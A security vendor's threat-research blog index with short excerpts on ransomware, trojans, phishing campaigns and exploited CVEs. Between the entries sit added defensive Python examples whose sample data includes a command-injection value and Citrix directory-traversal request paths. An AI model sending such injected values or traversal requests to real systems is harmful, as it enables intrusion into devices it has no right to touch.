The SonicWall Capture Labs Threat Research Team has observed a new Microsoft Excel sample, which uses curl.exe to download the AVE Maria Remote Admin Tool. This sample launches curl.exe using an XLM macro. cURL is a command-line […]
Posted: April 23, 2021
Targets mostly include a number of financial apps
Posted: April 23, 2021
The SonicWall Capture Labs Threat Research team observed reports of a new variant family of Runsomeaware RaaS actively spreading in the wild. Ransomware as a service (RaaS) is a subscription-based / free model that enables […]
Posted: April 22, 2021
Ignition versions prior to 2.5.2, as used in Laravel, allow unauthenticated remote attackers to execute arbitrary code.
Posted: April 16, 2021
Snake KeyLogger malware is being distributed using malicious Word documents.
Posted: April 16, 2021
The SonicWall Capture Labs Research team has observed another ransomware being circulated in the wild recently. To maintain communications with the compromised system this ransomware uses Discord’s built-in webhooks function. Discord is much more […]
Posted: April 13, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of April 2021.
Posted: April 9, 2021
Overview: VMware vRealize Operations Manager delivers intelligent operations management with application-to-storage visibility across physical, virtual, and cloud infrastructures. CVE-2021-21975 is an unauthenticated server-side request forgery (SSRF) vulnerability in VMware vRealize Operations API. The vulnerability was […]
Posted: April 9, 2021
The SonicWall Capture Labs threat research team has been tracking a ransomware family named Uniwinnicrypt. This malware is aimed at large corporations and the operators charge over $550k USD in crypto (Monero and Bitcoin) for […]
Posted: April 2, 2021
Overview: A denial of service vulnerability has been reported in OpenSSL library. An OpenSSL TLS server may crash if a remote attacker sends a maliciously crafted renegotiation ClientHello message (the exploit) from a client. If […]
Posted: March 26, 2021
Overview: SonicWall’s Capture Labs Threat Research Team recently captured and evaluated a new malicious sample termed Spyder, from China’s “Winnti” hacking group. This backdoor is written in C++ and designed to run on 64-bit Windows. […]
Posted: March 26, 2021
The SonicWall Capture Labs Threat Research team observed reports of a new variant family of Hog ransomware actively spreading in the wild. The Hog ransomware encrypts the victim’s files with a strong encryption algorithm and […]
Posted: March 18, 2021
SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in ZyXEL routers.
Posted: March 18, 2021
Infections continue even after gang member arrest
Posted: March 17, 2021
The SonicWall Capture Labs Threat Research Team has observed that a fake Space Starbase Invite is being circulated over email with a malicious excel document as an attachment. On opening the attachment, it will execute VBA […]
Posted: March 16, 2021
The SonicWall Capture Labs Threat Research team has received reports about a new Mirai botnet malware targeting network security devices. The Mirai botnet malware attack involves many different brands of connected network security devices that are […]
Posted: March 12, 2021
As Covid-19 vaccinations happen across the country, cybercriminals are riding the wave again using social engineering tactics purporting to be vaccine-related information to spread malware and steal user information. The SonicWall Capture Labs Research team […]
Posted: March 9, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of March 2021.
Posted: March 8, 2021
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample for 8t_Dropper aka RoyalRoad. Royal Road is a tool shared by many targeted attack groups believed to belong to China. The sample below […]
Posted: March 5, 2021
The SonicWall Capture Labs Threat Research team has received reports that threat actors are actively exploiting the following Microsoft Exchange vulnerabilities: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. These vulnerabilities allow the attackers access to emails found in […]
Posted: March 5, 2021
The SonicWall Capture Labs threat research team has observed reports of a variant from the Crysis/Dharma ransomware family called Lotus. The operators of this malware charge 1 BTC ($49K USD at the time of writing this alert) for […]
Posted: March 5, 2021
Observing modifications in the techniques being used to distribute ZLoader using MS-Excel file
Posted: February 26, 2021
A critical remote code execution vulnerability has been reported in VMware’s vSphere/vCenter. The vulnerability is due to improper validation of paths in an uploaded tarball. A remote, unauthenticated attacker could exploit this vulnerability by sending […]
Posted: February 26, 2021
The SonicWall Capture Labs Threat Research team observed reports of a new variant family of Parasite ransomware actively spreading in the wild. The Parasite ransomware encrypts the victim’s files with a strong encryption algorithm until […]
Posted: February 18, 2021
This Android banker contains a multitude of malicious capabilities
Posted: February 18, 2021
SonicWall Capture Labs threat research team observed attacks exploiting an old vulnerability in Netgear DGN devices.
Posted: February 12, 2021
Obfuscation is a technique commonly used by malware authors to render their code unreadable, preventing easy interpretation of the program that might give clues about their intent or behavior. This week, the SonicWall Capture […]
Posted: February 9, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of February 2021.
Posted: February 5, 2021
The SonicWall Capture Labs threat research team has observed reports of a variant of Paradise ransomware called Cukiesi. This ransomware family has been around since early 2018 and is reported to have originated from Russia. […]
Posted: January 14, 2021
The SonicWall Capture Labs Threat Research team observed reports of a new variant family of Babuk ransomware actively spreading in the wild. The Babuk ransomware encrypts the victim’s files with a strong encryption algorithm until […]
Posted: January 12, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of January 2021.
Posted: January 8, 2021
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample and activity for a Turla variant called GoldenSky. Turla has had many names since 2014, aka: Turla, Snake, Venomous Bear, VENOMOUS Bear, Group 88, […]
Posted: January 6, 2021
Fake Cyberpunk apps are on the rise
Posted: January 3, 2021
CVE-2020-1472 Zerologon – A vulnerability in the cryptography of Microsoft’s Netlogon process that allows an attack against Microsoft Active Directory domain controllers, making it possible for a hacker to impersonate any computer, including the root […]
Posted: December 23, 2020
SonicWall Capture Labs Threat Research team has observed hackers actively targeting the recent remote code execution vulnerability in the Apache Struts framework. This vulnerability is due to insufficient input validation, leading to a forced double […]
Posted: December 18, 2020
The SonicWall Capture Labs Threat Research team observed reports of a new variant family of Mobef ransomware actively spreading in the wild. The Mobef ransomware encrypts the victim’s files with a strong encryption algorithm just […]
Posted: December 14, 2020
Updated January 15, 2021 The U.S. Department of Homeland Security (DHS) and the Cybersecurity and Infrastructure Security Agency (CISA) have confirmed that malicious threat actors have been and are actively exploiting vulnerabilities in SolarWinds Orion […]
Posted: December 10, 2020
On December 8, 2020, cyber security firm FireEye disclosed an incident that resulted in the theft of their offensive security tools (OSTs) used by their Red Team to test the security posture of their customers. Some of […]
Posted: December 9, 2020
Contains a number of hardcoded components as well
Posted: December 8, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of December 2020.
Posted: December 7, 2020
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample and activity for Egregor Ransomware. The Egregor sample below is a library (DLL) that contains code and data that can be used by […]
Posted: December 4, 2020
Extracts sensitive information from user in exchange of fake promises
Posted: December 4, 2020
The SonicWall Capture Labs Research team has observed another ransomware being circulated in the wild recently. It was first spotted earlier this year but did not gain much traction then. Interestingly, this not-so-popular […]
Posted: November 25, 2020
SonicWall Capture Labs Threat Research team has observed the recent remote code execution vulnerability reported in Oracle WebLogic Server being exploited in the wild. This vulnerability is due to improper sanitization of user-supplied data […]
Posted: November 25, 2020
The SonicWall Capture Labs threat research team has observed reports of Hungarian PC users infected by Exerwa ransomware. It is reported that Exerwa is CTF malware that emerged from a Capture-the-Flag event where hackers are […]
Posted: November 20, 2020
The SonicWall Capture Labs Threat Research team observed reports of a new variant family of LOCKDOWN ransomware actively spreading in the wild. The LOCKDOWN ransomware encrypts the victim’s files with a strong encryption algorithm until […]
Posted: November 19, 2020
SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in Dasan GPON home routers.
Posted: November 12, 2020
Bahamut campaign aims at stealing sensitive user information from the device
Posted: November 10, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2020.
Posted: November 6, 2020
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample and activity for Ragnar Locker Ransomware. Cyberattacks using Ragnar Ransomware have impacted Biological E Ltd, Capcom, and Campari Group. A description of the […]
Posted: November 5, 2020
As the world watches for the outcome of the U.S. election and election night turns into election days, cybercriminals are riding the wave using social engineering tactics. The SonicWall Capture Labs Research team has analyzed […]
Posted: October 30, 2020
WordPress is a free and open-source content management system written in PHP. WordPress is used by more than 60 million websites. 38% of the web is built on WordPress. Its plugin architecture allows users to extend […]
Posted: October 26, 2020
This new variant has a number of measures against emulator based execution
Posted: October 22, 2020
SonicWall Capture Labs threat research team has observed attacks exploiting command injection vulnerabilities in AVTECH devices.
Posted: October 22, 2020
The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of NIBIRU ransomware [NIBIRU.RSM] actively spreading in the wild. The NIBIRU ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: October 16, 2020
Does not appear to be for research purposes
Posted: October 13, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of October 2020.
Posted: October 9, 2020
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample and activity for Emotet. Emotet is an advanced, self-propagating modular malware. Historically, Emotet was an advanced banking malware with botnet capabilities and indicators. […]
Posted: October 4, 2020
SonicWall Capture Labs Threat Research team observes attackers actively exploiting the arbitrary remote code execution vulnerability reported in the Tenda AC15 router. Tenda AC15 is an AC1900 Smart Dual-band Gigabit Wi-Fi Router designed for smart […]
Posted: October 2, 2020
The SonicWall Capture Labs threat research team have observed a new variant from the Phobos ransomware family. Like Sodinokibi, Phobos is sold on the criminal underground using the ransomware-as-a-service (RaaS) model. It is spread using […]
Posted: September 25, 2020
SonicWall Capture Labs Threat Research team observes attackers actively exploiting the recent remote code execution vulnerability reported in vBulletin. vBulletin is a popular forum software used by about 20,000 websites. It is written in PHP and uses the MySQL database. CVE-2020-17496 | Vulnerability: A remote code execution vulnerability has been reported in […]
Posted: September 25, 2020
The SonicWall Capture Labs threat research team observed reports of a new variant family of Zhen ransomware [Zhen.RSM] actively spreading in the wild. The Zhen ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: September 17, 2020
An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC).
Posted: September 16, 2020
Sends sensitive victim information from the device
Posted: September 9, 2020
This week the SonicWall Capture Labs research team analyzed an infostealing Trojan that is a mash-up of another infostealer Trojan and a ransomware. This Trojan is called Anubis but borrowed most of its code from […]
Posted: September 8, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of September 2020.
Posted: September 4, 2020
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample and activity for: ECCENTRIC BANDWAGON, DPRK. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. North […]
Posted: September 4, 2020
The SonicWall Capture Labs threat research team observed reports of a new variant family of Jackpot ransomware [Jackpot.RSM] actively spreading in the wild. The Jackpot ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: August 28, 2020
The SonicWall Capture Labs threat research team have observed a new family of ransomware called Darkside. The operators of this ransomware primarily target large corporations. Recently, a Canadian land developer and home builder, Brookfield Residential […]
Posted: August 27, 2020
Advantech WebAccess/NMS is a web browser-based software package for network management systems (NMS). It is designed with SNMP and ICMP communication standards for managing all Ethernet-enabled Advantech products and third-party devices. NMS can bring users an […]
Posted: August 21, 2020
This spyware steals a lot of sensitive victim information
Posted: August 20, 2020
Improper access control in Citrix ADC and Citrix Gateway allows unauthenticated access to certain URL endpoints.
Posted: August 14, 2020
The popular social media app TikTok is getting banned in a number of countries. Fraudsters are using this opportunity to spread fake TikTok apps in an effort to infect and scam more victims. SonicWall Capture […]
Posted: August 14, 2020
The SonicWall Capture Labs threat research team observed reports of a new variant family of VoidCrypt ransomware [VoidCrypt.RSM] actively spreading in the wild. The VoidCrypt ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: August 11, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of August 2020.
Posted: August 7, 2020
Overview: SonicWall Capture Labs Threat Research Team recently observed activity for the Chinese Remote Access Trojan Taidoor. Taidoor is composed of two stages, the loader and RAT module. The loader starts the service and decrypts […]
Posted: August 7, 2020
The SonicWall Capture Labs Research team has come across a Chinese word processor that comes packaged with an infostealer. This word processor comes as a Nullsoft installer and appears to be a legitimate notepad or […]
Posted: July 31, 2020
F5’s BIG-IP is a product family comprising software, hardware, and virtual appliances designed around application availability, access control, and security solutions. BIG-IP software products run on top of F5’s Traffic Management Operation System® (TMOS), […]
Posted: July 31, 2020
The SonicWall Capture Labs threat research team have observed reports of new ransomware named Exorcist. It is reported to have surfaced over the past week on an underground Russian forum using the ransomware-as-a-service (RaaS) model with […]
Posted: July 23, 2020
A command-injection vulnerability (CVE-2020-14472) exists in the mainfunction.cgi file on DrayTek Vigor3900, Vigor2960 and Vigor300B devices running firmware before 1.5.1.1. It can lead to remote code execution.
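The entry above names a command injection in a CGI handler. The following is an added example, not DrayTek’s code and not taken from the SonicWall post: a hypothetical “ping a host” handler written first in the vulnerable style (the parameter is interpolated into a string a shell parses) and then in a hardened form (allowlist validation plus an argv list, so no shell ever sees the input). The parameter name, the allowlist and the sample inputs are assumptions made for the example.

```python
import re

# Characters a shell treats as separators, substitutions or redirections.
SHELL_METACHARS = set(";|&`$(){}<>\n\r")

# Allowlist for a hostname or IPv4 literal (constructed for the example).
TARGET_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")


def build_ping_vulnerable(target: str) -> str:
    """Vulnerable pattern: the user-controlled value is spliced into a shell command string.

    If this string is handed to system()/popen(), anything after ';', '|' or '&'
    in `target` runs as a second command with the CGI's privileges.
    """
    return f"ping -c 1 {target}"


def build_ping_hardened(target: str) -> list:
    """Hardened pattern: reject anything outside the allowlist, then build an argv list.

    A list passed to subprocess.run(argv, shell=False) is executed directly and is
    never re-parsed by a shell, so metacharacters cannot change the command.
    """
    if not TARGET_RE.fullmatch(target):
        raise ValueError(f"rejected target: {target!r}")
    return ["ping", "-c", "1", target]


def contains_shell_metachars(value: str) -> bool:
    """Quick triage check for logged CGI parameters: does the value carry shell syntax?"""
    return any(ch in SHELL_METACHARS for ch in value)


def injected_commands(cmd: str) -> list:
    """Split a shell command string on the simple separators to show what would run.

    This only models ';', '&', '|' and newlines; it is a demonstration aid, not a parser.
    """
    return [part.strip() for part in re.split(r"[;&|\n]+", cmd) if part.strip()]


if __name__ == "__main__":
    hostile = "203.0.113.1;id"          # constructed attacker-supplied value
    print(injected_commands(build_ping_vulnerable(hostile)))
    print(build_ping_hardened("router.example.com"))
    try:
        build_ping_hardened(hostile)
    except ValueError as exc:
        print(exc)
```

The hardened version deliberately validates against an allowlist rather than stripping metacharacters: a denylist misses encodings and shell features the author did not think of, while a tight allowlist plus `shell=False` removes the shell from the path entirely.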
Posted: July 23, 2020
The SonicWall Capture Labs threat research team observed reports of a new variant family of Reha ransomware [Reha.RSM] actively spreading in the wild. The Reha ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: July 17, 2020
SonicWall RTDMI engine recently detected an Android malware that poses as a COVID-19 information app and combines banking Trojan, spyware, keylogger and ransomware functionality.
Posted: July 16, 2020
Dialers, RATs and apps with suspicious functionality were observed using the COVID-19 theme
Posted: July 14, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2020.
Posted: July 14, 2020
A remote code execution vulnerability exists in Windows Domain Name System servers when they fail to properly handle requests.
Posted: July 10, 2020
Overview: SonicWall Capture Labs Threat Research Team recently observed new activity for Valak. The Valak malware campaign is usually found lurking inside your email inbox or spam folder. The distribution of Valak is attached to […]
Posted: July 10, 2020
The pandemic has brought the world to a standstill but has not deterred cybercriminals. It has been a boon to malware authors and has provided a platform to exploit. The SonicWall Capture Labs Research […]
Posted: July 6, 2020
These improvements focus on making the malware stealthier
Posted: July 3, 2020
SonicWall Capture Labs Threat Research team has come across a new malspam campaign that pretends to deliver a legitimate PDF but installs malware on the victim’s computer. When a user opens this PDF, they will be […]
Posted: July 1, 2020
The SonicWall Capture Labs threat research team have observed reports of ransomware that encrypts files and appends a “.BadBoy” extension to their names. This variant of the malware is new but is based on Spartacus […]
Posted: June 27, 2020
SonicWall Capture Labs Threat Research team observed attackers actively targeting Zyxel NAS (Network Attached Storage) and firewall products affected by a remote code execution vulnerability. Vulnerability | CVE-2020-9054 A NAS system is a storage device […]
Posted: June 25, 2020
The SonicWall Capture Labs threat research team observed reports of a new variant family of COBRALOCKER ransomware [COBRALOCKER.RSM] actively spreading in the wild. The COBRALOCKER ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: June 22, 2020
An Android finance app has been uncovered that victimizes its users
Posted: June 18, 2020
SonicWall Capture Labs threat research team observed Zorab ransomware posing as a decryptor for DJVU ransomware.
Posted: June 17, 2020
This simple Android locker now uses Coronavirus theme
Posted: June 12, 2020
Black Lives Matter protests have spread across the United States and worldwide. The core of the protests has been activists taking to the streets, but in this very online age, while also amidst a pandemic, […]
Posted: June 9, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June 2020.
Posted: June 5, 2020
Overview: SonicWall Capture Labs Threat Research Team observed new activity from MUSTANG PANDA, using a unique infection chain related to the PlugX Trojan. The legitimate vulnerable binary is part of Adobe’s suite, which will load […]
Posted: June 5, 2020
Malware authors are using scams with attractive headlines such as – Flipkart lock down sale, Paytm limited period offer.
Posted: June 5, 2020
The SonicWall Capture Labs threat research team have observed reports of spam inviting people to view an “image” in which the email states they are present. The “image”, which in our case was named IMG148150.jpg.js is […]
Posted: June 5, 2020
The SonicWall Capture Labs threat research team have observed reports of spam inviting people to view an “image” in which they are supposedly present. The “image”, which in our case was named IMG148150.jpg.js is actually a […]
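The two entries above describe the same lure: an attachment named IMG148150.jpg.js that is really a script. Windows hides known extensions by default, so the recipient sees a .jpg and runs JScript. The following is an added example, not code from the SonicWall posts, showing one way a mail gateway or triage script can flag such names by looking at the real (final) extension and any decoy data extension in front of it. The extension sets and the sample filenames other than IMG148150.jpg.js are constructed for the example.

```python
from pathlib import PurePosixPath

# Extensions Windows executes or interprets when double-clicked (constructed, not exhaustive).
EXECUTABLE_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
                   ".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".ps1", ".lnk"}

# Extensions a recipient expects to open as harmless data.
DECOY_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp", ".pdf", ".txt",
              ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx"}


def classify_attachment(name: str) -> dict:
    """Classify an attachment filename by its real (last) extension.

    Only the final suffix decides what the OS runs; any data-looking suffix
    before it is a decoy aimed at the recipient, not at the operating system.
    """
    # Strip padding spaces some lures insert between the fake and the real extension.
    suffixes = [s.strip().lower() for s in PurePosixPath(name).suffixes]
    real_ext = suffixes[-1] if suffixes else ""
    decoys = [s for s in suffixes[:-1] if s in DECOY_EXTS]
    executable = real_ext in EXECUTABLE_EXTS
    return {
        "name": name,
        "real_ext": real_ext,
        "executable": executable,
        "double_extension": executable and bool(decoys),
    }


def flag_attachments(names):
    """Return the names to quarantine: anything whose real extension is executable."""
    return [n for n in names if classify_attachment(n)["executable"]]


# Constructed sample names; IMG148150.jpg.js is the one reported in the posts.
SAMPLE_ATTACHMENTS = [
    "IMG148150.jpg.js",
    "holiday.jpeg",
    "invoice.pdf                .exe",
    "quarterly-report.final.pdf",
    "setup.vbs",
]

if __name__ == "__main__":
    for n in SAMPLE_ATTACHMENTS:
        print(classify_attachment(n))
    print("quarantine:", flag_attachments(SAMPLE_ATTACHMENTS))
```

The quarantine decision keys on the real extension alone; the `double_extension` flag is kept separately because it is the stronger phishing indicator and worth its own alert, while a plain `setup.vbs` may be blocked by policy without being a deception attempt.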
Posted: June 5, 2020
This threat continues to evolve
Posted: May 29, 2020
An insecure deserialization vulnerability has been reported in Oracle Weblogic. This vulnerability is due to insufficient validation of user requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to a […]
Posted: May 28, 2020
The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of DragonCyber ransomware [DRAGON.RSM] actively spreading in the wild. The DragonCyber ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: May 26, 2020
This coin-miner contains a number of components that work together
Posted: May 22, 2020
SonicWall Capture Labs threat research team observed Infostealer Trojan hiding in Covid-19 related email attachments.
Posted: May 20, 2020
These apps contain code related to Android spyware SpyNote
Posted: May 16, 2020
This week the Sonicwall Capture Labs research team received yet another Trojan capitalizing on the current Covid-19 pandemic. As more and more states require citizens to wear masks in public, it was inevitable that malware authors […]
Posted: May 12, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of May 2020.
Posted: May 8, 2020
Overview: SonicWall Capture Labs Threat Research Team has observed and trapped activity for the banking Trojan family called “Zeus Sphinx”. Sphinx goes by many other names, such as ZLoader, Terdot or DELoader. ZLoader has […]
Posted: May 8, 2020
The SonicWall Capture Labs threat research team have come across new ransomware known to the antivirus community as Instabot. It is actively spreading and the webserver used by the operators is currently online at the […]
Posted: May 4, 2020
The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of PROJECTZORGO ransomware [PROJECTZORGO.RSM] actively spreading in the wild. The PROJECTZORGO ransomware has been specially designed by a team of underground […]
Posted: May 4, 2020
SonicWall Capture Labs Threat Research team has come across a new variant of Raccoon stealer (V1.5) that was used in a malicious COVID-19 campaign. While we wear masks to defend against coronavirus, a bandit masked raccoon seeks to take advantage of the coronavirus outbreak. Infection Cycle As with several other attacks, this campaign […]
Posted: April 23, 2020
SonicWall Capture Labs threat research team observed scams related to CoVid-19 in recent weeks.
Posted: April 23, 2020
Malicious Android apps using the name and icon of Zoom app surface during the lock-down
Posted: April 18, 2020
With stay-at-home orders implemented in several states and cities in the country in an effort to slow the spread of the novel coronavirus, internet data usage has spiked with more people being online and confined […]
Posted: April 14, 2020
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of April 2020.
Posted: April 13, 2020
SonicWall RTDMI™ engine detected the NetWire RAT the same day it was created and spread. The RAT uses an AMSI-bypass module and a Rzy Protector module.
Posted: April 13, 2020
Since the COVID-19 pandemic started, we have been seeing various malware families cashing in on the COVID-19 scare for their distribution. Earlier, we had also posted an alert about the families milking this pandemic. Beware […]
Posted: April 10, 2020
The SonicWall Capture Labs threat research team have come across a new ransomware family known as Ada Covid. The sample we analysed appears to be in early stages of development and does not modify any […]
Posted: April 10, 2020
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample and activity in April for a downloader called GuLoader. GuLoader is used in conjunction with other malware components such as RATs (Remote Administration […]
Posted: April 8, 2020
Excel 4.0 macro being used to deliver Malware
Posted: April 3, 2020
UPDATED APRIL 8TH Scammers have devised numerous ways of defrauding people in connection with COVID-19. Some examples of scams linked to COVID-19 include treatment, testing, medical supplies, insurance, charity, work from home, investment, student loan, […]
Posted: April 2, 2020
The SonicWall Capture Labs threat research team observed reports of a new variant family of PROJECT23 ransomware [PROJECT23.RSM] actively spreading in the wild. The PROJECT23 ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: March 31, 2020
A Trojan that overwrites the MBR
Posted: March 28, 2020
SonicWall Capture Labs Threat Research team has come across another variant of Metamorfo banking trojan that tries to take advantage of the global crisis due to COVID-19 pandemic. This malware was first seen 2 days […]
Posted: March 25, 2020
Another coronavirus-related app with malicious capabilities
Posted: March 23, 2020
This ransomware uses scare tactics to lure victims into paying the ransom
Posted: March 20, 2020
As the coronavirus pandemic unfolds, the SonicWall Capture Labs Research team also observes an increasing amount of malicious software actively exploiting this crisis. As we have previously reported, we have seen different malware families […]
Posted: March 20, 2020
The malware started using a new technique that redirects bitcoin transactions to the malware author’s bitcoin address.
Posted: March 19, 2020
SonicWall Capture Labs Threat Research Team recently found a new RekenSom ransomware. Infection Cycle: At the onset of execution, a named mutex “Rekensom” is created to ensure only one instance of the sample is running. […]
Posted: March 19, 2020
SonicWall Capture Labs Threat Research Team has observed a ransomware taking advantage of the Coronavirus fear.
Posted: March 19, 2020
Malware authors are misusing Coronavirus disease (COVID-19) pandemic scare to get into the victim’s machine.
Posted: March 17, 2020
This blog entry contains a constantly updated list of CoronaVirus related threats covered by the SonicWall Capture Labs Threats Research team: Android CoronaVirus Ransomware comes bundled with decryption code (March 23, 2020) IOCs: d1d417235616e4a05096319bb4875f57 GAV […]
Posted: March 17, 2020
The Grandoreiro banking trojan is highly active in Latin America and Europe and is now abusing Google Sites to host its C&C server address.
Posted: March 16, 2020
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample and activity in March for the “Corona-virus” binary below. Malware authors have taken advantage of the public’s desire for information on the COVID-19 […]
Posted: March 14, 2020
Websites that claim to contain coronavirus-related information lead to the download of an Android RAT
Posted: March 13, 2020
A scareware that spreads using the name of Covid-19
Posted: March 13, 2020
The SonicWall Capture Labs Threat Research Team have been observing a family of ransomware called Ouroboros. The malware became prominent around late 2019 and has undergone various transformations over the last few months. It is based […]
Posted: March 12, 2020
A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests.
Posted: March 10, 2020
SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of March 2020.
Posted: March 6, 2020
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample and activity in March for the GigaCLR Trojan binary. It starts out as a self-extracting native executable that drops two binaries: one a .NET […]
Posted: March 5, 2020
The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of MARRACRYPT ransomware [MARRACRYPT.RSM] actively spreading in the wild. The MARRACRYPT ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: February 29, 2020
SonicWall Capture Labs Threat Research team observes attackers actively probing for vulnerable Microsoft Exchange servers. Vulnerability | CVE-2020-0688: A remote code execution vulnerability has been reported in Microsoft Exchange Server. The weakness is due to […]
Posted: February 26, 2020
Android RAT spreads under the name Coronavirus
Posted: February 22, 2020
The Sonicwall Capture Labs Threat Research team has analyzed a malware purporting to be an installer of a popular VPN software. This is not the first time that malware has pretended to be a VPN […]
Posted: February 21, 2020
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka ‘Scripting Engine Memory Corruption Vulnerability’
Posted: February 14, 2020
The SonicWall Capture Labs Threat Research Team have recently come across a new variant of Ako ransomware. The malware spreads via spam email and shares similarities to MedusaLocker. This has led many to believe that the […]
Posted: February 11, 2020
SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of February 2020.
Posted: February 8, 2020
Overview: SonicWall Capture Labs Threat Research Team analyzed a new sample, found in February 2020, of a backdoor Trojan project named “Androm”. Trojans appear to contain benign or useful functionality, but also contain code […]
Posted: February 7, 2020
The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of ENC ransomware [ENC.RSM] actively spreading in the wild. The ENC ransomware encrypts the victim’s files with a strong encryption algorithm […]
Posted: February 6, 2020
VBScript files delivered as email attachments inside archive files are being used to execute DanaBot on the victim’s machine.
Posted: February 5, 2020
The world is fighting this deadly coronavirus, running awareness campaigns and sharing documents about precautionary measures. Cyber threat actors are taking this as an opportunity to profit from people’s fear by distributing malware files and claiming they are coronavirus awareness documents.
Posted: February 1, 2020
Linear eMerge E3: Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation, and personal safety systems and devices. Nortek Security and Control LLC’s Linear eMerge E3 is an access controller that specifies […]
Posted: January 30, 2020
Android adware that is different from the others
Posted: January 28, 2020
Maze ransomware with anti-analysis techniques
Posted: January 28, 2020
Fake antivirus apps “detect” risky apps based on static JSON files
Posted: January 24, 2020
Citrix NetScaler ADC/Gateway Directory Traversal Vulnerability CVE-2019-19781 is being actively exploited in the wild.
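The entry above reports active exploitation of a directory traversal on Citrix ADC/Gateway. The following is an added example, not code from the SonicWall post: a small scanner that reads web-server access-log lines, percent-decodes the request path (twice, to catch double encoding), and flags any request containing a literal `..` segment, which no normal browser produces. The log lines are constructed sample data using RFC 5737 addresses; the `/vpn/../vpns/` shape follows the publicly reported CVE-2019-19781 pattern, but nothing here is captured traffic.

```python
import posixpath
import re
from urllib.parse import unquote

# Fields we need from a common/combined format access-log line (constructed regex).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_path(raw: str) -> str:
    """Drop the query string, percent-decode twice (defeats %252e), normalise slashes."""
    path = raw.split("?", 1)[0]
    for _ in range(2):
        path = unquote(path)
    return path.replace("\\", "/")


def is_traversal(raw_path: str) -> bool:
    """True when the decoded path carries a literal '..' segment.

    '..' inside a filename (report..pdf) is not a traversal; only a whole
    segment equal to '..' moves the resolved path up a directory.
    """
    return ".." in decode_path(raw_path).split("/")


def scan_log(lines):
    """Return one record per traversal attempt: source, status, raw path, resolved path."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_traversal(m["path"]):
            continue
        hits.append({
            "ip": m["ip"],
            "status": int(m["status"]),
            "raw_path": m["path"],
            # What the traversal actually reaches once the server collapses '..'.
            "resolved": posixpath.normpath(decode_path(m["path"])),
        })
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Jan/2020:03:14:07 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 1002',
    '198.51.100.4 - - [11/Jan/2020:03:15:00 +0000] "GET /vpn/index.html HTTP/1.1" 200 4321',
    '203.0.113.7 - - [11/Jan/2020:03:16:12 +0000] "GET /vpn/%2e%2e/vpns/cfg/smb.conf HTTP/1.1" 200 1002',
    '198.51.100.9 - - [11/Jan/2020:03:17:45 +0000] "GET /vpn/%252e%252e/vpns/cfg/smb.conf?x=1 HTTP/1.1" 404 221',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

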